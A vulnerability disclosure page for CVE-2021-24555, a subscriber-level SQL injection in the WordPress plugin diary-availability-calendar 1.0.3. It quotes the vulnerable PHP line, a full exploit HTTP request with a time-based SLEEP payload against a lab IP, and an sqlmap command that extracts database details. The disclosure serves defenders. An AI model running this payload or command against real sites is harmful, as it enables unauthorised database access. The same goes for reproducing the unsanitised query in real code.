wp-plugin : diary-availability-calendar | Code Vigilant : to err is human.. To fix is Humanity

Wp Plugin Diary Availability Calendar

Plugin Details

Plugin Name: wp-plugin : diary-availability-calendar

Effected Version : 1.0.3 (and most probably lower version's if any)

Vulnerability : Injection

Minimum Level of Access Required : Subscriber

CVE Number : CVE-2021-24555

Identified by : Shreya Pohekar

WPScan Reference URL

Disclosure Timeline

May 14, 2021: Issue Identified and Disclosed to WPScan
May 19, 2021 : Plugin Closed
July 20, 2021 : CVE Assigned
July 23, 2021 : Public Disclosure

Technical Details

The delete calendar functionality takes in POST parameter id which is passed into the SQL statement without proper sanitisation, validation or escaping that leads to SQL Injection. Furthermore, the ajax call is not properly validated in terms of session check and therefore makes the plugin vulnerable at subsciber level too.

Vulnerable Code: diary-availability-calendar.php#L561

559:                    $id = $_POST["id"];
560:
561:                    $wpdb->query("DELETE FROM ".$wpdb->prefix.$entries_table." WHERE id = $id");

PoC Screenshot

Exploit

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 172.28.128.50
Content-Length: 40
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://172.28.128.50
Referer: http://172.28.128.50/wp-admin/admin.php?page=daac-calendar
Accept-Language: en-US,en;q=0.9
Cookie: wordpress_logged_in_232395f24f6cff47569f2739c21385d6=subscriber%7C1621354259%7CGgsBwDkoDZKcvZAcxb2GDBOdhN48qzMsMb6kY55KjhQ%7C61cd2bfaac2b99029b99d7040ea49bee669ea719d34dd3c1b7417f5dd75fce70; wordpress_test_cookie=WP%20Cookie%20check; wp-settings-time-4=1620144659; wordpress_232395f24f6cff47569f2739c21385d6=subscriber%7C1621354259%7CGgsBwDkoDZKcvZAcxb2GDBOdhN48qzMsMb6kY55KjhQ%7C268d8983e3cb02b9c953c1b85fbb585740d5bc04cbf3455ff410ff0b1e83e6d1; wordpress_232395f24f6cff47569f2739c21385d6=subscriber%7C1621354259%7CGgsBwDkoDZKcvZAcxb2GDBOdhN48qzMsMb6kY55KjhQ%7C268d8983e3cb02b9c953c1b85fbb585740d5bc04cbf3455ff410ff0b1e83e6d1;
Connection: close

action=daac_delete_booking&id=1%20AND%20(SELECT%201209%20FROM%20(SELECT(SLEEP(5)))bOrN)

SQLmap command

sqlmap -r diary-availability-calendar.req --dbms mysql --current-user --current-db -b -p id --batch